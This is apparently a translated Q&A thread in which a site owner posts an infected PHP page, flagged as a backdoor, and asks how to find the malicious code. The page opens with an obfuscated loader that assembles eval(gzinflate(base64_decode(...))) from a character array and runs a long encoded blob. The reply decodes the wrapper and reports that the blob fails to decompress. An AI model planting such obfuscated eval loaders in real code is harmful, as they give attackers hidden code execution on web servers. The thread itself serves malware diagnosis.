PHP文件被SiteLock-PHP-BACKDOOR-GENERIC-co.UNOFFICIAL感染

时间:2014-09-10 12:10:48

标签: php linux hosting malware virus

我测试了我的网站感染,发现有66个文件是受感染的php文件,但我真的无法将任何恶意代码导入这些文件,也不知道如何从这些文件中删除感染文件。下面是我的扫描的屏幕截图 - >

enter image description here

我检查了所有这些文件中的恶意代码,并将其与旧备份进行了比较,但未发现任何可疑内容。谷歌搜索了很多,溢出stackoverflow与搜索,但没有帮助。请帮我解决一下如何跟踪这个病毒代码。

以下是单个文件的代码:

    <?php
$md5 = "23423b2hj34j23b4hj23b4jk23bjb4bb34jb";
$aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");
$ba4 = create_function('$'.'v',$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]);
$ba4('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');
?>
<?php include 'biComposer/start.php' ?>
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> 
<html class="no-js"> <!--<![endif]-->
  <head>
    <title>Lorem Ipsum is simply dummy text </title>
    <meta name="description" content="" />
    <?php include_partial('meta') ?>
  </head>

  <body>

    <?php include_partial('header', array('caption' => 'about')) ?>

    <section class="main">
      <div class="content">
        <article>
          <h1>about us</h1>
          <h3>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard</h3>
          <p>
            Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/land-acquisition.jpg" alt="">
          </div>
          <p>
           Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has


          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/business-division.jpg" alt="" usemap="#Map">
            <map name="Map">
              <area shape="rect" coords="46,100,200,158">
              <area shape="rect" coords="224,100,380,158">
              <area shape="rect" coords="405,100,555,158">
              <area shape="rect" coords="582,101,732,159">
            </map>
          </div>
        </article>
      </div>
    </section>

    <?php include_partial('footer') ?>

  </body>

 <?php include_partial('js') ?>

</html>

1 个答案:

答案 0 :(得分:1)

所以:

$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]

实际上是

eval(gzinflate(base64_decode($v)));

但是,如果我们将$v设置为

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

我使用PHP 5.2.5得到data error,同样的情况发生在这里:http://sandbox.onlinephpfunctions.com/code/f7fb8d6e35bede9f007b2d77ee87e30957825e0a